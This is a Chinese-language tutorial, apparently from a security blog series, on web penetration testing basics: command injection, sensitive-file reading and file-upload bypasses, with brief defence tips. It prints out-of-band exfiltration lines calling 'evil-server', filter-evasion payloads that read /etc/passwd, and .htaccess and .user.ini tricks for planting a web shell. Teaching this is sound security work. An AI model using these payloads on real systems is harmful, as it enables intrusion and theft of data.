e起學丨WEB安全滲透測試基礎知識(八)

各位小夥伴,e小安又來和大家一起學習啦!今天我們繼續學習WEB安全滲透測試的基礎知識第八部分。

3.5 命令注入

3.5.1. 簡介

命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。

該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞。

3.5.2. 常見危險函數

3.5.2.1. PHP

● system

● exec

● passthru

● shell_exec

● popen

● proc_open

3.5.2.2. Python

● system

● popen

● subprocess.call

● spawn

3.5.2.3. Java

● java.lang.Runtime.getRuntime().exec(command)

3.5.3. 常見注入方式

● 分號分割

● || && & 分割

● | 管道符

● \\r\\n %d0%a0 換行

● 反引號解析

● $() 替換

3.5.4. 無回顯技巧

● bash反彈shell

● DNS帶外數據

● http帶外

curl http://evil-server/$(whoami)

wget http://evil-server/$(whoami)

● 無帶外時利用 sleep 或其他邏輯構造布爾條件

3.5.5. 常見繞過方式

3.5.5.1. 空格繞過

● < 符號 cat<123

● \\t / %09

● ${IFS} 其中{}用來截斷,比如cat$IFS2會被認為IFS2是變量名。另外,在後面加個$可以起到截斷的作用,一般用$9,因為$9是當前系統shell進程的第九個參數的持有者,它始終為空字符串

3.5.5.2. 黑名單繞過

● a=l;b=s;$a$b

● base64 echo "bHM=" | base64 -d

● /?in/?s => /bin/ls

● 連接符 cat /etc/pass'w'd

● 未定義的初始化變量 cat$x /etc/passwd

3.5.5.3. 長度限制繞過

>wget\\

>foo.\\

>com

ls -t>a

sh a

上面的方法為通過命令行重定向寫入命令,接著通過ls按時間排序把命令寫入文件,最後執行 直接在Linux終端下執行的話,創建文件需要在重定向符號之前添加命令 這裡可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結束,這樣就等於標準輸入流的重定向 而在php中 , 使用 shell_exec 等執行系統命令的函數的時候 , 是不存在標準輸入流的,所以可以直接創建文件

3.5.6. 常用符號

3.5.6.1. 命令分隔符

● %0a / %0d / \\n / \\r

● ;

● & / &&

3.5.6.2. 通配符

● * 0到無窮個任意字符

● ? 一個任意字符

● [ ] 一個在括號內的字符,e.g. [abcd]

● [ - ] 在編碼順序內的所有字符

● [^ ] 一個不在括號內的字符

3.5.7. 防禦

● 不使用時禁用相應函數

● 儘量不要執行外部的應用程序或命令

● 做輸入的格式檢查

● 轉義命令中的所有shell元字符

shell元字符包括 #&;`,|*?~<>^()[]{}$\\

3.6 文件讀取

考慮讀取可能有敏感信息的文件。

● 用戶目錄下的敏感文件

.bash_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

● 應用的配置文件

/etc/apache2/apache2.conf

/etc/nginx/nginx.conf

● 應用的日誌文件

/var/log/apache2/access.log

/var/log/nginx/access.log

● 站點目錄下的敏感文件

.svn/entries

.git/HEAD

WEB-INF/web.xml

.htaccess

● 特殊的備份文件

.swp

.swo

.bak

index.php~

● Python的Cache

__pycache__\\__init__.cpython-35.pyc

3.7 文件上傳

3.7.1. 文件類型檢測繞過

3.7.1.1. 更改請求繞過

有的站點僅僅在前端檢測了文件類型,這種類型的檢測可以直接修改網絡請求繞過。同樣的,有的站點在後端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網絡請求繞過。

3.7.1.2. Magic檢測繞過

有的站點使用文件頭來檢測文件類型,這種檢查可以在Shell前加入對應的字節以繞過檢查。幾種常見的文件類型的頭字節如下表所示

e起學丨WEB安全滲透測試基礎知識(八)

3.7.1.3. 後綴繞過

部分服務僅根據後綴、上傳時的信息或Magic Header來判斷文件類型,此時可以繞過。

php由於歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的後綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時測試該類型。

jsp引擎則可能會解析 jspx / jspf / jspa / jsw / jsv / jtml 等後綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等後綴。

除了這些繞過,其他的後綴同樣可能帶來問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。

3.7.1.4. 系統命名繞過

在Windows系統中,上傳 index.php. 會重命名為 . ,可以繞過後綴檢查。也可嘗試

index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件

3.7.1.5. .user.ini

在php執行的過程中,除了主 php.ini 之外,PHP 還會在每個目錄下掃描 INI 文件,從被執行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項,故可以使用 .user.ini 加上非php後綴的文件構造一個shell,比如 auto_prepend_file=01.gif 。

3.7.1.6. WAF繞過

有的waf在編寫過程中考慮到性能原因,只處理一部分數據,這時可以通過加入大量垃圾數據來繞過其處理函數。

另外,Waf和Web系統對 boundary 的處理不一致,可以使用錯誤的 boundary 來完成繞過。

3.7.1.7. 競爭上傳繞過

有的服務器採用了先保存,再刪除不合法文件的方式,在這種服務器中,可以反覆上傳一個會生成Web Shell的文件並嘗試訪問,多次之後即可獲得Shell。

3.7.2. 攻擊技巧

3.7.2.1. Apache重寫GetShell

Apache可根據是否允許重定向考慮上傳.htaccess

內容為:

AddType application/x-httpd-php .png php_flag engine 1

就可以用png或者其他後綴的文件做php腳本了。

3.7.2.2. 軟鏈接任意讀文件

上傳的壓縮包文件會被解壓的文件時,可以考慮上傳含符號鏈接的文件 若服務器沒有做好防護,可實現任意文件讀取的效果。

3.7.3. 防護技巧

● 使用白名單限制上傳文件的類型

● 使用更嚴格的文件類型檢查方式

● 限制Web Server對上傳文件夾的解析

本文內容出於傳遞更多信息之目的,屬於非營利性的轉載。如無意中侵犯了某個媒體或個人的知識產權,請聯繫我們,我們將立即刪除相關內容。其他媒體、網絡或個人從本網下載使用須自負版權等法律責任。


分享到:


相關文章: